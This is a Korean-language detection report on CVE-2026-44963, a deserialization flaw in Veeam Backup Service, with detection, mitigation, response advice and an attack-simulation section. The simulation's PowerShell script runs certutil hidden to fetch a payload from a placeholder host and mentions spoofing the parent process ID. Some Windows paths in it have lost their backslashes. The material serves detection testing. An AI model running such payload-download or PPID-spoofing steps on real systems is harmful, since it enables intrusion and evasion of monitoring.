CVE-2026-44963: Veeam 백업 서비스 악용의 지표
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
이 보고서는 Veeam Backup Service의 취약점인 CVE-2026-44963와 관련된 침해 지표를 설명합니다. 이 취약점은 불안정한 비직렬화로 인해 원격 코드 실행을 가능하게 할 수 있습니다. 공격자들은 Veeam 서비스에서 의심스러운 자식 프로세스를 시작하여 결함을 악용할 수 있습니다. 결과적으로, 이러한 활동은 불법적인 접근을 초래하고 네트워크 전반에 걸친 횡적 이동의 기회를 만듭니다.
조사
이 조사는 Veeam.Backup.Service.exe에 의해 생성된 의심스러운 자식 프로세스를 탐지하는 데 중점을 둡니다. 여기에는 cmd.exe or powershell.exe와 같은 도구와 Veeam 관련 포트의 비정상적인 네트워크 활동 식별이 포함됩니다. 분석가들은 Veeam 디렉토리 내의 무단 로그인 이벤트 및 예상치 못한 파일 변경 사항을 주시해야 합니다.
완화
위험을 줄이기 위해 관리자들은 불안전한 비직렬화 결함을 해결한 버전으로 Veeam Backup & Replication을 업데이트해야 합니다. 방화벽 정책은 Veeam 포트에 대한 접근을 엄격히 제한해야 하며 9392-9419을 비관리자 도메인 사용자가 이 서비스에 인증하는 것을 모니터링해야 합니다. 서비스 계정도 최소 권한 원칙에 따라 제한되어야 합니다.
대응
의심스러운 활동이 탐지되면 해당 Veeam 서버는 즉시 네트워크에서 격리되어야 합니다. 조사자들은 이벤트 ID 4688 과 Sysmon 원격 측정, 네트워크 연결 기록을 포함한 프로세스 실행 로그를 검토하여 침해 정도를 결정해야 합니다. 최근 계정 활동을 감사하고, 의심되는 침입 창 동안 관련된 모든 계정의 자격 증명을 재설정해야 합니다.
공격 흐름
시뮬레이션 실행
전제 조건: 원격 측정 및 기준선 사전 점검이 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적대적 기술(이하 TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 내러티브는 식별된 TTP를 직접적으로 반영하고 탐지 논리에서 예상되는 정확한 원격 측정을 생성하는 것을 목표로 합니다. 추상적이거나 관련 없는 예시는 오진을 초래할 것입니다.
-
공격 내러티브 및 명령어: 공격자는 Veeam Backup Service의 취약점을 대상으로(모의) 실행 권한을 얻습니다. 두 번째 단계 페이로드를 다운로드하는 동안 저프로파일을 유지하기 위해, 공격자는 하이재킹된 Veeam 프로세스를 활용하여
certutil.exe와 같은 일반적인 Living-off-the-Land 바이너리를 사용하여 원격 파일을 가져옵니다. 이 작업은process_creation탐지 규칙의 논리를 유발하도록 설계되었습니다. -
회귀 테스트 스크립트:
# 시뮬레이션 시작: 이 스크립트는 Veeam 서비스가 의심스러운 프로세스를 생성하는 것을 시뮬레이션합니다. # 참고: 관리자/시스템 권한 없이 Veeam 서비스가 되기는 어렵기 때문에, # 시험실에서 ParentImage 경로를 모방하는 더미 프로세스를 생성하여 원격 측정을 시뮬레이션합니다. $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe" $TargetBinary = "certutil.exe" Write-Host "[+] $VeeamPath에서 의심스러운 자식 프로세스를 시뮬레이션 중" -ForegroundColor Cyan # 실제 환경에서는 취약점이 이 서비스를 호출하게 만들 것입니다. # 검증을 위해 프로세스를 트리거합니다. Sigma 규칙 # 'ParentImage' 요건을 엄격히 일치시키기 위해 테스트자는 프로세스를 수동으로 이름 변경하거나 # 특정 EDR을 테스트하는 경우 Parent Process ID (PPID)를 스푸핑하기 위한 도구를 사용해야 합니다. Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden Write-Host "[+] 시뮬레이션 명령어 실행되었습니다." -ForegroundColor Green -
정리 명령어:
# 시뮬레이션에서 생성된 임시 파일 제거 Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue Stop-Process -Name "certutil" -ErrorAction SilentlyContinue